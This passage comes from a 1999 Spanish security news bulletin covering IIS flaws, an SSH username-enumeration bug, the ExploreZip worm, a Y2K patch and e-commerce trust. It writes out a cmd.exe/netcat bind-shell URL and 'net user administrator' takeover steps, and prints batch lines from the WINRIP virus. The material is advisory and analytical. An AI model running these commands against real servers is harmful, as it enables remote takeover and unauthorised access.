o casi nulas, si bien en el extranjero los usuarios y corporaciones
afectadas se cifran por miles. Podemos encontrar varias causas a
esta situación, en primer lugar el texto en inglés en el cuerpo
del mensaje ha hecho sospechar a la mayoría de los usuarios. Por
otra parte, la rápida reacción de las empresas antivirus, así como
de los medios de información en alertar a los usuarios y por
último la alarma creada en anteriores casos, como el CIH y
Melissa, ha provocado que muchos usuarios y corporaciones se
preocuparan por actualizar los antivirus y mantener un interés
continuo en este aspecto.

Más información:
HispaSec (Reacciones en relación al gusano Zipped_Files, 13-6-99)
HispaSec (ZippedFiles, el nuevo Melissa, 10-6-99)


Antonio Ropero



jueves, 17 de junio de 1999

El ataque a servidores Windows NT sigue siendo noticia

Durante el día de hoy se han sucedido las noticias en torno al agujero
de Windows NT del que os informábamos ayer. Sitios web atacados,
noticias en diversos medios, parche de eEye y hasta una comunicación
de Microsoft han protagonizado el día de hoy.
Ya por la mañana diversos servidores web en nuestro país aparecían
atacados a causa del problema de sobrecarga de buffer en Internet
Information Server. Sin duda se trata de un asunto de gran gravedad,
tal y como informamos ayer, las características del agujero hacen que
un gran número de máquinas sean fácilmente atacables. Por su parte,
el CERT (Computer Emergancy Responce Team) también ha publicado un
aviso concerniente a este bug.

Hasta el momento la única solución viable para evitar el problema
pasaba por el cambio en la configuración recomendado por Microsoft,
si bien este método deshabilita algunas características como el
directorio /iisadmpwd/ de cambio de contraseñas de usuario. La opción
de cambio de passwords por web, puede ser utilizada por usuarios
remotos que acceden al servidor para actualizar el web, pero deben
cambiar su password periódicamente por las políticas de administración.
Estos usuarios se pueden encontrar sin posibilidad de acceso debido
a que su contraseña caduque y no tengan posibilidad de renovarla.

eEye, el equipo que descubrió el agujero, ha llegado más lejos y
publica un parche (con fuentes) que resuelve el problema y conserva
todas las funcionalidades. El parche de eEye se basa en limitar las
peticiones de archivos htr a 255 caracteres, y guarda en un log la IP
del atacante que intenta la sobrecarga. eEye admite que el parche no
es perfecto, ya que existen más sobrecargas en la librería ism.dll
aparte de la asociada a extensiones htr. Pero representa un gran
avance respecto a la recomendación de Microsoft que simplemente se
basa en eliminar el filtro ISAPI.

Pero la publicación del problema ha causado una gran polémica en el
mundo de la seguridad informática. Microsoft conocía el problema
desde el pasado día 8 sin haber tomado ninguna medida, ni hacerlo
público (junto con la solución eventual). Pasada una semana, el
equipo de eEye se decidió a divulgar el agujero en vista de que la
compañía no tomaba ninguna resolución en el tema. Pero ahora Microsoft
critica a eEye por hacer público el aviso e incluir el programa para
explotar la vulnerabilidad. La compañía de Redmond afirma que esta
forma de proceder es «contraria a todas las reglas habituales de los
profesionales responsables de la seguridad». Microsoft también comunica
que se encuentra trabajando en el parche que solucione de forma
correcta el problema.

Más información:
HispaSec: http://www.hispasec.com/unaaldia.asp?id=232
Parche de eEye: http://www.eeye.com/database/advisories/ad06081999/ad06081999-ogle.html
Aviso de eEye: http://www.eEye.com/database/advisories/ad06081999/ad06081999.html
Boletín de Microsoft: http://www.microsoft.com/security/bulletins/ms99-019.asp
Aviso del CERT: http://www.cert.org/advisories/CA-99-07-IIS-Buffer-Overflow.html
CNet: http://www.news.com/News/Item/0,4,37949,00.html?st.ne.fd.mdh.ni



Antonio Ropero



miércoles, 16 de junio de 1999

Grave problema de seguridad en Internet Information Server 4.0

Se acaba de hacer público un nuevo agujero en Internet Information
Server 4.0 para Windows NT 4.0. Un gran número de servidores pueden
verse afectados por un problema de sobrecarga de buffer.
Es posible que un 90% de los servidores NT con IIS 4 (option Pack 4)
se vean afectados por este problema. eEye Digital Security Team advierte
del peligro de la existencia de un ataque por sobrecarga de buffer a
través del servidor web, que puede posibilitar desde la denegación de
servicios hasta la ejecución remota de código.

Si se envía una orden "GET /[sobrecarga].htr HTTP/1.0", donde [sobrecarga]
es una cadena de unos 3 Kbytes, el Internet Information Server trata de
leer la página solicitada, pero la isapi.dll no realiza un chequeo
apropiado del tamaño causando una sobrecarga. El fallo es en relación
a las páginas de extensión .htr. Este tipo de páginas permite a los
usuarios de Windows NT modificar su password a través del servidor web
en el directorio /iisadmpwd/. Para hacer posible la actualización de la
password se habilitan unas páginas htr y la dll ism.dll de extensión
isapi.

El filtro isapi para archivos htr se instala por defecto en todos los
IIS 4, por lo que todo parece indicar que un gran número de servidores
Windows NT se pueden ver afectados por el problema. Todo ello, de forma
independiente del Service Pack que tengan instalado, ya que el problema
se reproduce con SP3 hasta SP5.

Para demostrar la seriedad del problema, eEye Digital Security Team
publica el código para llevar a cabo el ataque, cargando y ejecutando
un troyano en la máquina remota desde nuestro servidor web. El troyano
empleado es ncx.exe, una versión hackeada y comprimida de netcat. La
parte modificada de este netcat consiste en pasar siempre -l -p 80 -t
-e cmd.exe como argumento. Lo que básicamente significa que netcat
está comprometiendo continuamente el cmd.exe en el puerto 80. Tras
cargar el troyano, el atacante puede efectuar un telnet al puerto 80,
con lo que se le abre una sesión DOS con derechos de administrador.

Microsoft ha publicado un boletín de aviso explicando el problema y
anuncia que en breve publicará un parche para solucionarlo. Aunque
de momento, recomienda a los administradores la desinstalación de la
asignación de archivos htr. Para lo que recomienda seguir los siguientes
pasos:

- Desde el escritorio, ejecutar el Administrador de Servicios Internet,
para lo cual se debe seguir: Inicio/ Programas/ Windows NT 4.0 Option
Pack/ Microsoft Internet Information Server/ Administrador de Servicios
Internet
- Doble-Click en "Internet Information Server".
- Con el boton derecho pulsar sobre el nombre del ordenador y seleccionar
"Propiedades".
- En las Propiedades Principales seleccionar "Servicio WWW" en la caja
desplegable, tras ello, pulsar "Modificar".
- Seleccionar la pestaña "Directorio Particular", en ella, pulsar el
botón "Configuración".
- Marcar la línea que contiene la extensión .htr y pulsar el botón
"Quitar".
- Responder "Sí" a "¿Desea quitar la asignación de la secuencia de
comandos seleccionada?". Terminar pulsando tres veces sobre "Aceptar"
y cerrar el Administrador de Servicios Internet.

Es importante concienciarse de la importancia de seguir estos sencillos
pasos, y eliminar este problema del servidor. De no hacerlo, la máquina
puede quedar expuesta a cualquier tipo de ataque.

Más información:
Aviso eEye
Boletin Microsoft
Wired



Antonio Ropero



martes, 15 de junio de 1999

El Sellado Digital de Tiempos de CriptoLab

Después de un año de pruebas, el Laboratorio de Criptología,
CriptoLab, de la Facultad de Informática de la UPM presenta y pone a
disposición del público en general su Servicio Digital de Sellado de
Tiempos.
Los objetivos de esta iniciativa son dar a conocer alguno de los
nuevos sistemas telemáticos avanzados que se desarrollan en CriptoLab,
así como poner a disposición de los usuarios de Internet un mecanismo
sencillo para dar referencia temporal a sus ficheros, e-mails,
software, paginas web, y un largo etcétera de posibles usos
relacionados con el Tiempo e Internet.

Este nuevo servicio esta compuesto de tres elementos: Por una parte,
consta de una Unidad de Sincronismo NTP que mantiene en su reloj
hardware el Tiempo Universal UTC con una precisión media de algunos
microsegundos. En concreto, durante el año de pruebas las desviaciones
medias han sido: diarias de 2.15 us, semanales de 2.0 us y anual de
1.0 us [ver http://www.fi.upm.es/ccfi/ en estadísticas-> NTP-> Offset
Stratum1].

Sobre esta unidad de referencia, el servicio de Sellado Digital de
Tiempos está constituido por una Autoridad de Certificación Avanzada,
denominada TicTac, que emite sellos de tiempo para cualesquiera
documentos u objetos digitales que considere el solicitante, a través
de sus valores hash o resúmenes, y que es accesible con Navegadores de
Internet en la dirección http://TicTac.fi.upm.es

Como último elemento del sistema, los investigadores de CriptoLab han
desarrollado una Aplicación Cliente que permite obtener sellos de
tiempo para cualquier fichero desde unidades que funcionen bajo los
sistemas operativos Microsoft Win95, Win98 y WinNT. La distribución de
esta aplicación se puede obtener en la dirección
http://tirnanog.ls.fi.upm.es/Servicios/Software y puede ser utilizada
por cualquiera con fines de evaluación y no comerciales o de
explotación.

Para todos aquellos que quieran saber más sobre los detalles técnicos
y funcionales de este servicio, pueden consultar los documentos
específicos "Registros Públicos Automáticos: El Tiempo y su Veracidad"
y "Diseño y Realización de un Sistema Digital de Tiempo" disponibles
en los servidores de CriptoLab, así como las páginas web de TicTac.

Las únicas restricciones claramente expresadas por CriptoLab son que
se reservan los derechos de copyright y a la propiedad intelectual de
todo el sistema y de sus componentes, así como la limitación del uso
de este servicio para fines puramente particulares, descartando su
posible uso comercial sin autorización expresa por parte de CriptoLab.

Dado el carácter abierto de esta iniciativa, sus promotores
agradecerían cualesquiera comentarios o sugerencias que les permitan
mejorar este servicio, tanto en sus prestaciones como en su
accesibilidad para todos los usuarios de Internet.

Para cualquier consulta o comentario dirigirse al TimeMaster de
CriptoLab (timemaster@dilmun.ls.fi.upm.es)

Más información:
Servicio Digital de Sellado de Tiempos


Gonzalo Álvarez Marañón
criptonomicon@iec.csic.es
Boletín Criptonomicón #51
http://www.iec.csic.es/criptonomicon



lunes, 14 de junio de 1999

Control total de NT a través del servidor web

Un nuevo agujero en NT 4.0 con Information Server puede permitir a un
atacante con acceso remoto a un directorio con permisos de escritura
y ejecución, modificar cualquier password, incluida la de administrador.
El atacante debe tener acceso a un directorio del servidor web en el
que se dispongan de permisos de ejecución. Esto puede conseguirse a
través de un ataque por fuerza bruta a través de netbios, ftp,
ColdFusion o cualquier otra debilidad que permita obtener la password
de un usuario. El atacante debe subir a un directorio ejecutable del
servidor el programa netcat (nc.exe) y el cmd.exe. Esto es, deberá
subirse al directorio cgi-bin, scripts, iisadmpwd, o cualquiera similar.

Al introducir la siguiente línea en el navegador (quizás sea necesario
sustituir por %20 los espacios):

http://www.servidor.com/cgi-bin/cmd.exe?/c cgi-bin\nc.exe -L -p 10000 -t -e cmd.exe

el atacante abrirá una sesión DOS remota en el puerto 1000 del servidor,
con lo que bastará efectuar un telnet al puerto 1000 para entrar en
dicha sesión dentro del directorio cgi-bin.

Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.
C:\InetPub\wwwroot\cgi-bin>

Al efectuar el telnet, se hace con los permisos del usuario que inició
la sesión, es decir la cuenta IUSR_NombreMaquina. El siguiente paso,
viene de la mano de los comandos net. El bug sólo funciona si se
estableció "net stop server" por un administrador u otro usuario con
los permisos necesarios. Si a a través de la sesión telnet se introduce
"net start server" el usuario IUSR_NombreMaquina podrá iniciar el
servicio. Pero además, el atacante puede también introducir "net user
administrator nuevapassword" y conseguirá cambiar con éxito la password
de administrador.

Si el servicio netlogon no se inicia con "net start server", el
atacante puede intentar "net start netlogon", y podrá ser capaz de
mapear cualquier unidad a su ordenador. Si es necesario puede llegar
a compartir "ADMIN$", "C$", etc. Después de fijar la nueva password
de administrador y el servicio netlogon, el atacante podrá administrar
el IIS del ordenador remoto y modificar los permisos de la cuenta
IUSR_NombreMaquina a administrador.

Tras ello, se abre una nueva sesión DOS remota a través del navegador,
pero en esta ocasión, el proceso se inicia con derechos de administrador,
merced al cambio anteriormente realizado. Tras esto, el atacante no
sólo tiene control total de la máquina sino que además puede hacer uso
de utilidades DOS para consola y programas del kit de recursos como
tlist.exe, kill.exe, netsvc.exe, etc. para que la invasión pase
inadvertida.

Más información:
Aviso
Netcat



Antonio Ropero



domingo, 13 de junio de 1999

Reacciones en relación al gusano Zipped_Files

El jueves saltaba a luz un nuevo virus, en HispaSec nos hicimos eco
de este hecho alertando y analizando como suele ser habitual este
nuevo elemento conocido como Zipped_Files.
El jueves al mediodía aparecían en nuestro país las primeras
incidencias de Zipped_Files, el gusano que ha acaparado las últimas
noticias del mundo informático. Ya por la noche HispaSec realizaba
un detallado estudio del virus del cual os hacíamos partícipes esa
misma noche en nuestra noticia diaria.

Ya el jueves podíamos compararlo, por sus características de
reproducción como el nuevo Melissa. De hecho, no solo se reproducía
tan rápido o más que el ya mítico virus, sino que su payload dañino
lo convertía en un auténtico peligro para las redes locales. No hemos
tenido que esperar mucho para comprobar que la comparación no era
exagerada.

Miles de ordenadores afectados en todo el mundo, grandes compañías
atacadas por el virus se vieron en la necesidad de apagar sus
servidores. Como PricewaterhouseCoopers que apagó sus servidores
de correo, dejando sin servicio a más de 45.000 empleados, o la
conocida empresa aereoespacial Boeing que también tuvo que proceder
de forma similar afectando la parada a más de 150.000 empleados.

Al igual que ocurrió con Melissa, y dada la repercusión de este virus
y su especial gravedad el mismo FBI ya se encuentra investigando todo
lo relacionado a este caso. Todo para buscar y localizar al autor de
Zipped_FIles, parece ser que la creación de virus informáticos es
un delito que el FBI está dispuesto a perseguir duramente.

Este gusano es especialmente grave no sólo por sus difusión a través
del e-mail sino que, como ya advertimos en HispaSec a raíz de nuestro
análisis, dispone de habilidades de infección y ataque a través de
las redes locales sin intervención de los usuarios. Como ya
informamos en total primicia, este hecho era una importante
característica que había pasado desapercibida en los análisis
de los especialistas. Pasados ya dos días de nuestro primer informe,
Trend Micro viene a confirmar nuestra información en relación a
dichas características.

Pese a que apenas contamos con tiempo material, y que la información
a todos los niveles ya empezaba a ser abundante, dedidimos realizar
una breve monitorización del gusano. Nuestra intención era la de
poder confirmar los datos que arrojaban las casas especializadas
y poder ofreceros la forma de eliminarlo en caso de infección, a
priori sólo un trámite ya que todos los análisis coincidían entre
sí a la hora de describir a ZippedFiles.

Comenzamos pasadas las 1 de la madrugada, al mismo tiempo que se
escribía la noticia, con los datos que se habían recogido durante
la jornada, se llevaba a cabo en nuestro laboratorio un seguimiento
del gusano. Procedimos a infectar un equipo de pruebas a través del
cual pudimos observar la forma de operar, traceando a distintos
niveles las acciones del programa. Pronto pudimos observar como
el gusano tenía características para la búsqueda, infección y
borrado de ficheros a través de recursos compartidos de la red. Tan
sólo hubo que aumentar el sistema de pruebas con algunos equipos de
nuestra red local para poder confirmar este hecho.

Han tenido que transcurrir 48 horas, desde nuestra noticia, para que
una de las multinacionales del sector descubriera e hiciera pública
esta importante característica. Trend Micro, en una detallada
actualización de su alerta inicial, confirma la información que ya
os facilitamos en su día. Atrás quedan casas de la talla de Network
Associates, Panda Software o AVP, si bien ésta última ha corregido
en parte esta deficiencia en su última actualización, donde describe
que el gusano puede llevar a cabo el borrado de ficheros a través
de la red local, aunque no indica que puede también copiarse y
autoinstalarse.

Más información:
HispaSec
Actualización Zipped Files Trend Micro
Alertas Trend Micro
CNet



Bernardo Quintero/Antonio Ropero



sábado, 12 de junio de 1999

Nuevo parche para solucionar problemas del 2000 en Windows 95

Tras detectar varios problemas con la entrada del milenio en su
sistema operativo Windows 95, Microsoft ofrece a disposición de los
usuarios de este sistema operativo. un parche para solucionar todas
las contrariedades.
Al finalizar la descarga desde la web de Microsoft nos encontraremos
con un ejecutable comprimido llamado W95y2k.exe. Que será el que tras
ejecutarlo, actualice nuestro sistema para compatibilizarlo al año
2000. Es importante reseñar, que no se puede desinstalar este parche
y que sólo es funcional para Windows 95.

Debido a que esta actualización produce cambios en la configuración
de la red al instalar una nueva versión del archivo vdhcp.386,
deberemos prestar una especial atención al agregar nuevos adaptadores
de red o configurar nuevos servicios on-line. En estos casos se
solicita el CD de Windows 95 con lo que se sobreescribe el archivo
actualizado, por lo que será necesario volver a ejecutar el parche.

Este parche viene a solucionar un gran conjunto de problemas
relacionados con el año 2000, como la realización de búsquedas en
el cuadro de diálogo Buscar "Archivos o carpetas". En este cuadro
se muestra el año en el formato de dos dígitos. El administrador de
archivos de Windows también se ve afectado, ya que no muestra ni
ordena correctamente las fechas posteriores al año 2000. Por su
parte el comando date del intérprete de comandos (command.com) no
trata correctamente las fechas de dos dígitos entre 00 y 79.

Otros programas afectados y que se ven corregidos mediante esta
actualización son el Selector de fecha y hora, el Marcador de
teléfono, la opción Fecha y hora del Panel de control, el controlador
virtual de DHCP (vdhcp.386), la librería Microsoft Foundation Class
(mfc40.dll), el comando Xcopy de DOS (xcopy.exe, xcopy32.exe) y la
automatización OLE.

Más información:
http://www.microsoft.com/windows95/downloads/contents/wurecommended/s_wufeatured/win95y2k/default.asp?site=95


Antonio Román



viernes, 11 de junio de 1999

La empresa española IP6 advierte de un bug en SSH

SSH son las siglas de Secure SHell, una aplicación muy conocida y
ampliamente distribuida que permite el acceso remoto de forma
segura mediante la encriptación de los datos transmitidos. El
cliente de SSH está disponible de forma totalmente gratuita para
diversos sistemas operativos, lo que ha contribuido a su difusión.
El bug, descubierto por IP6 Seguridad, revela de forma muy clara
el hecho de que incluso las herramientas teóricamente más seguras
pueden fallar si su implementación es deficiente. En concreto,
debido a este bug, cualquier atacante remoto puede obtener
fácilmente el nombre de los usuarios de la máquina sobre la que
se ejecuta el servidor de SSH. Ello es debido a que éste responde
de forma diferente a los intentos de conexión según se produzcan
usando, o no, el nombre de un usuario válido.

Tanto la versión 2.0.12 como la 2.0.13, la última disponible hasta
la fecha, se ven afectadas por este bug. Más específicamente,
cuando el cliente trata de conectar con el servidor de SSH
utilizando un nombre de usuario válido, dispone de un determinado
número de intentos para introducir la password correcta (por
defecto tres) antes de ser desconectado. Sin embargo, cuando trata
de conectar usando un nombre de usuario no existente en el sistema,
sólo dispone de una oportunidad para introducir la password.

Veamos un ejemplo:

Supongamos que el usuario alfonso NO existe en la máquina 192.168.0.1,
pues bien, podríamos saberlo simplemente tratando de conectarnos a
la máquina vía ssh utilizando el nombre de usuario alfonso. Después
de esto, cuando introduzcamos la password, nos dirá que no es la
correcta y nos desconectará inmediatamente sin darnos opción a
intentarlo de nuevo con otra password. Algo así:

$ssh 192.168.0.1 -l alfonso
alfonso's password: < ENTER >

Disconnected; authentication error
(Authentication method disabled.

Sin embargo, después de ver que alfonso NO es un usuario autorizado
en la máquina, podemos tratar de probar suerte con otras posibilidades
para el nombre de usuario, como por ejemplo altellez. Algo así:

$ssh 192.168.0.1 -l altellez
altellez's password: < ENTER >
altellez's password:

En este momento, se dispone de un nombre de usuario correcto. Esto
supone una grave vulnerabilidad, que podría ser explotada por un
atacante remoto para generar un ataque de diccionario.

Este bug es aún más grave si se utiliza en conjunción con la también
reciente vulnerabilidad descubierta por el grupo J.J.F./Hackers Team,
ya publicada con anterioridad en una-al-día (http://www.hispasec.com/unaaldia.asp?id=201).
La solución más rápida para el bug, y que curiosamente también
resuelve el bug anunciado por J.J.F./Hackers Team es, simplemente,
editar el fichero de configuración del servidor de SSH (habitualmente
el sshd2_config, en /etc/ssh2) y cambiar el valor de "PasswordGuesses"
a 1.

Más información:
Ataque por fuerza bruta a sshd2 v.2.0.11 (HispaSec 16-5-1999)
SSH Communications Security
IP6 Seguridad


Alfonso Lázaro Téllez
IP6 Seguridad



jueves, 10 de junio de 1999

ZippedFiles, el nuevo Melissa

Ha saltado la alarma, un nuevo gusano con características de
reproducción similares a Melissa está invadiendo las redes
informáticas de todo el mundo.
Esta mañana empezaron a aparecer los primeros elementos, en
HispaSec hemos tenido ocasión de ver como un ejemplar de este
gusano se ha reproducido por múltiples estaciones de una red en
cuestión de pocos minutos. Al contrario que con Melissa cuya
incidencia fue mínima en nuestro país, parece que este elemento
sí que puede llegar a colapsar redes en todo el mundo y correr de
buzón en buzón al igual que el clásico Happy99. Al menos lo hemos
comprobado esta mañana.

El gusano, al que ya se le atribuyen diversos nombres Worm.ExploreZip
(según Symantec) o I-Worm.ZippedFiles (según AVP) es muy peligroso
por diversos motivos, que van desde su alto índice de reproducción
hasta su payload dañino. El gusano emplea comandos MAPI (Messaging
Application Program Interface) y Microsoft Outlook o Exchange en
los sistemas Windows para propagarse, y podemos afirmar que a día
de hoy el virus ya se encuentra en nuestro país.

El índice de propagación es elevado ya que el gusano se autoenvía
a las direcciones que tengamos en la carpeta Inbox del cliente
de correo. Para ello, genera una respuesta a un mensaje recibido,
en la que se incluye enlazado el archivo "zipped_files.exe" (con
un tamaño de 210,432 bytes). En el e-mail incluye el siguiente
texto en inglés:

Hi nombre_del_destinatario!
I received your email and I shall send you a reply ASAP.
Till then, take a look at the attached zipped docs.
bye

Que traducido quedaría como sigue:

Hola nombre_del_destinatario!
He recibido tu email y te responderé tan pronto como pueda.
Hasta entonces, mira los documentos comprimidos adjuntos.
Adios

Cuando el programa se ejecuta, sale la ventana de error provocada
por el propio troyano, con un mensaje indicando que no puede
abrir el archivo, como si no fuera un tipo de fichero válido y
lo confundiera con parte de un zip. Si se acepta (unica opcion)
ejecuta el winzip original, para que el usuario no sospeche nada.
Pero la acción maliciosa del gusano ya habrá iniciado su curso.

El gusano se copia a sí mismo en el directorio System de Windows
bajo el nombre "Explore.exe" o de "_setup.exe" en la carpeta
Windows. Tras ello, modifica el win.ini (en entornos Windows 95/98)
o el registro (bajo Windows NT) para que se ejecute cada vez que
se inicie Windows. Para conseguir direcciones de correo y seguir
propagándose emplea el cliente de correo.

Pero la acción del gusano no queda ahí, sino que además contiene
un payload malicioso que hace que al ser ejecutado busque por
las unidades desde C hasta Z, (lo que incluye unidades de red
mapeadas) y en general en cualquier recurso compartido de la
red, y destruya ficheros de forma aleatoria. La acción consiste
en crear otro archivo de idéntico nombre y longitud 0 bytes. Los
ficheros destruidos son de las siguientes extensiones doc
(documentos Microsoft Word), xls (hojas de cálculo Excel), ppt
(presentaciones PowerPoint), asm (código fuente en ensamblador),
c, h y cpp (código fuente y librerias de C y C++).

Por otra parte, y según hemos podido comprobar en el Laboratorio
de HispaSec, Zipped_files también es capaz de reproducirse y
ejercer su acción dañina a través de una red local. Si encuentra
acceso al directorio Windows de cualquier usuario de la red
procederá a la infección de dicho equipo copiándose y modificando
el win.ini correspondiente, además de destruir los ficheros
anteriormente mencionados en el equipo remoto.

Hay que hacer especial incapié en este hecho. Nos ha sorprendido
que ninguna casa antivirus se haya hecho eco de esta caracteristica
en sus analisis ya que es de extrema gravedad en entornos
corporativos, en los que puede hacer estragos. Pues es capaz de
infectar máquinas sin la necesidad de que el usuario interactue,
como en el caso de tener que abrir/ejecutar el adjunto por email,
sino que sin que el usuario se de cuenta puede verse infectado, y
la proxima vez que se inicie se ejecute. Sin olvidar la posibilidad
de poder ser víctima directa al borrar los ficheros de datos a
través de la red.

Como en otras ocasiones, en HispaSec vamos a explicar como eliminar
este gusano de cualquier ordenador sin necesidad de recurrir a
ninguna herramienta o antivirus. Basta con borrar la línea
run=C:\WINDOWS\SYSTEM\Explore.exe o run=C:\WINDOWS\_setup.exe
(dependiendo de la forma en que haya realizado la infección) del
archivo win.ini y eliminar el fichero explore.exe del directorio
system de Windows. Una vez realizados estos dos pasos, es necesario
reiniciar el ordenador para que la operación pueda darse por
terminada.

Bajo NT, Zipped_files actúa de forma diferente, ejecutándose como un
proceso dentro del Adminiustrador de tareas bajo el nombre "Explore".
Se puede evidenciar una carga elevada de utilización de la CPU justo
antes de finalizar el proceso. Para eliminarlo hay que ejecutar
Regedit (no regedit32) y localizar la clave
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows
Tras esto, se debe eliminar el registro
"run"="C:\WINNT\System32\Explore.exe" o "run"="C:\WINNT\_setup.exe".
Por último sólo queda reiniciar Windows NT y borrar el archivo
Explore.exe del directorio system32 de WinNT.

Más información:
Symantec
Network Associates
AVP
Panda Software
TrendMicro
DataFellows
Sophos
ZDNet



Antonio Ropero



miércoles, 9 de junio de 1999

Barreras al comercio electrónico

Recientemente ha aparecido publicada una encuesta sobre las barreras
al comercio electrónico, llevada a cabo por ITAA (Information
Technology Association of America, www.itaa.org) y Ernst & Young
(www.ey.com). Es un hecho que el comercio electrónico no ha
experimentado el crecimiento ni la aceptación que el entusiasmo
inicial pronosticaba para el futuro inmediato.
La encuesta tenía por cometido el analizar cuáles eran los mayores
factores que actúan de freno a la expansión de la actividad
comercial en Internet y de acuerdo con los resultados obtenidos,
la barrera más importante es, cómo no, la falta de confianza
(señalada por el 62% de los encuestados). Esta desconfianza hacia
las nuevas tecnologías se articula en torno a tres temores
fundamentales:

- La privacidad (60%), que los usuarios finales sienten amenazada en
la medida en que desconocen hasta qué punto los datos personales que
suministran a un servidor de comercio electrónico serán tratados de
forma confidencial. ¿Quién le asegura al comprador que sus datos no se
almacenarán a la ligera, siendo accesibles fácilmente por un hacker o
un empleado desleal? ¿Cómo saber que no se revenden a terceros?

- La autenticación (56%), que inquieta a los usuarios, quienes dudan
de si la persona con la que se comunican es verdaderamente quien dice
ser. Cuando se entra en los locales físicos del Corte Inglés de la
ciudad, uno se siente seguro de que no hay trampa ni cartón. Sin
embargo, dada la relativa facilidad de falsificar una página web e
incluso un sitio web completo, ¿cómo asegurarse de que se está
comprando en el Corte Inglés virtual y no en una imitación fiel?

- La seguridad global (56%), que preocupa a los usuarios, pues temen
que la tecnología no sea suficientemente robusta para protegerles
frente a ataques y apropiaciones indebidas de información
confidencial, especialmente en lo que respecta a los medios de pago.
Es interesante el hecho de que de toda la actividad de compra, lo que
más sigue preocupando es la operación de pago, es decir, el momento en
el que el comprador se enfrenta a la ventana donde ha introducido su
número de tarjeta de crédito y duda a la hora de pulsar el botón de
"Enviar". "¿Me timarán?, ¿seré víctima de un fraude?", se pregunta el
usuario en el último momento.

Estos temores, qué duda cabe, tienen su fundamento real y su solución
no resulta trivial. En el primer caso, la tecnología, y en concreto la
criptografía, ofrecen las herramientas necesarias para la protección
férrea de la información almacenada en las bases de datos
corporativas, información como listas de clientes, sus datos
personales y de pago, listas de pedidos, etc. Existen muchas técnicas
de control de acceso que hábilmente implantadas garantizan el acceso a
la información confidencial exclusivamente a aquellos usuarios
autorizados para ello. Ahora bien, se han producido incidentes de
servidores de comercio que almacenaron esta clase de información
sensible ¡en ficheros accesibles vía web por cualquier navegante! Por
lo tanto, aunque la criptografía provee de medios aptos, depende en
última instancia del comerciante el nivel de compromiso que adopte
respecto a la seguridad de los datos que conserva en sus ficheros y su
política de control de acceso. Así pues, éste es un temor bien
presente y sin fácil respuesta. La tecnología nada tiene que decir si
un comerciante decide vender su información a terceros. La delgada
línea que protege la privacidad del usuario está constituida en este
caso por la integridad moral del comerciante. En estas circunstancias,
más vale asegurarse antes de con quién se comercia.

En el segundo caso, la solución inmediata que ofrece la criptografía
viene de la mano de los certificados digitales. La tecnología de
certificación está suficientemente madura como para autenticar
adecuadamente a las partes involucradas en una transacción. La más
comúnmente utilizada es SSL y a pesar de la tan cacareada limitación
criptográfica fuera de Norteamérica de claves débiles de 40 bits, lo
cierto es que a la hora de autenticar a las partes, principalmente al
servidor, SSL funciona satisfactoriamente. Otro asunto es si asegura o
no la confidencialidad, cuestión más que dudosa, si se tiene en cuenta
que una clave de 40 bits se rompe en cuestión de horas, con lo que los
datos por ella protegidos quedan al descubierto rápidamente. Otras
tecnologías emergentes, como SET, ofrecen mucha mayor confianza en
este campo y, de paso, dan solución al primer problema de la
privacidad. SET permite autenticar a las partes involucradas en la
transacción de manera completamente segura, sin restricciones
criptográficas debidas a absurdas leyes de exportación. Su mecanismo
de firma dual garantiza además que el comerciante no conocerá los
datos de pago (número de tarjeta de crédito), eliminando así la
posibilidad de fraude por su parte. SET garantiza así que el
comerciante cobra por la venta y que el comprador no es estafado por
el comerciante ni por hackers. En los próximos meses se oirá hablar
más de SET, sin duda.

En cuanto al tercer temor, nuevamente la criptografía moderna y los
productos de seguridad proporcionan las soluciones a los problemas.
Otra cuestión es: ¿incorporan los servidores de comercio todas las
medidas necesarias para asegurar las transacciones con el usuario? En
otras palabras, la tecnología está sobre el tapete y ofrece solución
tecnológica a los retos que se le presentan a la seguridad en el
comercio electrónico, pero ¿se usa correctamente? ¿Se usa en absoluto?

Por lo que parece, las verdaderas barreras al comercio electrónico no
son tanto tecnológicas como humanas. Una vez más, el eslabón más débil
de la cadena es de índole personal, no tecnológico.

Más información:
Texto con los resultados de la encuesta



Gonzalo Álvarez Marañón
criptonomicon@iec.csic.es
Boletín Criptonomicón #51
http://www.iec.csic.es/criptonomicon



martes, 8 de junio de 1999

HispaSec analiza a WINRIP, un virus-BAT para NT

Hace unas semanas os descubríamos en primicia el primer virus para
Corel Draw. En aquel entonces muchos se asombraron de como un virus
podía programarse en un lenguaje tán básico y sencillo como Corel
Script, basado en BASIC. En esta ocasión presentamos un virus para
Windows NT que tiene la peculiaridad de infectar todos los ficheros
ZIP y, lo que más llama la atención, con tan sólo siete líneas de un
fichero de proceso por lotes.
El ensamblador es, sin duda, el lenguaje por excelencia a la hora de
crear los virus informáticos. Control, potencia y optimización tienen
cabida en este lenguaje que, sin embargo, sólo está al alcance de
desarrolladores avanzados. Tal vez sea por esta causa por lo que los
virus de macro, basado en lenguajes scripts y derivados de BASIC, han
tenido un auge tan espectacular en estos últimos tiempos, gracias a la
facilidad para su programación.

Sencillos de hacer y con facilidades para expandirse, los virus de
macro, en especial para Office, ocupan los primeros puestos en las
listas de prevalencia. Una de las últimas muestras que más repercusión
han obtenido la podemos encontrar en el virus Melissa, escrito para
Word, el procesador de textos de Microsoft. Pero no sólo del
ensamblador y los macros nacen los virus, en prácticamente todos
los lenguajes es factible implementar un programa que se replique.
Podemos encontrar muestras en C, Pascal, Java o, como en este caso, en
un simple fichero BAT. Veamos como trabaja a través de un recorrido por
su código.

En las primeras dos líneas, nos encontramos con un comando que oculta
los mensajes que se pudieran derivar de las ordenes, para no alertar
al usuario y un comentario donde se puede leer el nombre del virus y
la firma de autoría.

-----
@echo off
@echo REM WINRIP by SkamWerks Labs > winripem.bat
-----

A continuación, el virus se copia a sí mismo (winrip.bat) en el
directorio de inicio automático (startup) en las versiones inglés de
Windows NT, lo que le asegura su ejecución cada vez que se inicie la
sesión. La utilización de múltiples "\.." le permite llegar al raíz
y encontrar la ruta correcta aunque el fichero se ejecute desde una
subcarpeta con varios niveles de profundidad, como es el caso de la
carpeta de inicio de Windows.

-----
@copy winrip.bat "c:\..\..\..\..\..\..\..\winnt\profiles\default user\start menu\programs\startup\winrip.bat"
-----

En la cuarta línea se realiza un listado de ficheros en busca de la
localización del archivo winzip32.exe, que almacena en una variable
para utilizarlo posteriormente, lo que le permitirá comprimirse e
introducirse en los ficheros ZIP.

Los parámetros utilizados son:
/s para recorrer el directorio actual y subdirectorios.
/b para listar únicamente los nombres de los ficheros sin encabezados
